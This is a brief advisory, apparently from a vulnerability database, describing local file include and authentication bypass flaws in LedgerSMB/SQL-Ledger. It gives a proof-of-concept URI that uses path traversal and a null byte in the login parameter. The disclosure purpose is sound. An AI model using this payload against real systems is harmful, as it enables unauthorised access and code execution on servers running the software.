LedgerSMB/SQL-Ledger Login Parameter Local File Include And Authentication Bypass Vulnerabilities

LedgerSMB/SQL-Ledger Login Parameter Local File Include And Authentication Bypass Vulnerabilities

Attackers can exploit these issue through a browser.

The following proof-of-concept URI is available:

http://www.example.com/sql-ledger/am.pl?login=../../../home/user/foo.pl%00&action=add_department